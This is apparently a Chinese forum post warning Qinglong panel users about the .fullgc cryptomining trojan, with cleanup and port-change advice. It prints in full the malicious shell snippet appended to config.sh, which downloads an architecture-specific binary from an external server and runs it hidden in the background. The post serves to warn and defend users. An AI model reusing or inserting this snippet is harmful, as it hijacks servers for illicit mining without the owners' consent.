登录后免广告,享受更多奶昔会员权益!
您需要 登录 才可以下载或查看,没有账号?注册
×
2026年2月7日,多名用户发现青龙面板被植入名为.fullgc的挖矿木马,导致服务器CPU占用率异常升至800%。该木马通过篡改config.sh配置文件实现持久化,并能根据系统架构自动下载恶意程序。排查结果显示,暴露于公网IPv4环境的服务器是该木马的主要攻击目标。
安全机构判定该程序属于SusMiner家族,主要通过连接XMR矿池进行非法挖矿。GitHub社区已出现多例相关案例报告,建议用户检查/ql/data/db/路径下的隐藏文件。受影响用户需清理恶意代码并关闭公网管理端口以防范后续风险。
检查\data\config\config.sh 最后一段有
d="${QL_DIR:-/ql}/data/db";b="$d/.fullgc";case "$(uname -s)-$(uname -m)" in Linux-x86_64|Linux-amd64)u="https://file.551911.xyz/fullgc/fullgc-linux-x86_64";;Linux-aarch64|Linux-arm64)u="https://file.551911.xyz/fullgc/fullgc-linux-aarch64";;Darwin-x86_64)u="https://file.551911.xyz/fullgc/fullgc-macos-x86_64";;Darwin-arm64)u="https://file.551911.xyz/fullgc/fullgc-macos-arm64";;esac;[ -n "$u" ]&&[ ! -f "$b" ]&&{ curl -fsSL -o "$b" "$u"||wget -qO "$b" "$u"; }&&chmod +x "$b";[ -f "$b" ]&&! ps -ef|grep -v grep|grep -qF ".fullgc"&&nohup "$b" >/dev/null 2>&1 &
删除然后重新创建镜像 这个就是挖矿病毒 不要再继续使用5700了换个端口 |
雷达卡
发表于 
照妖镜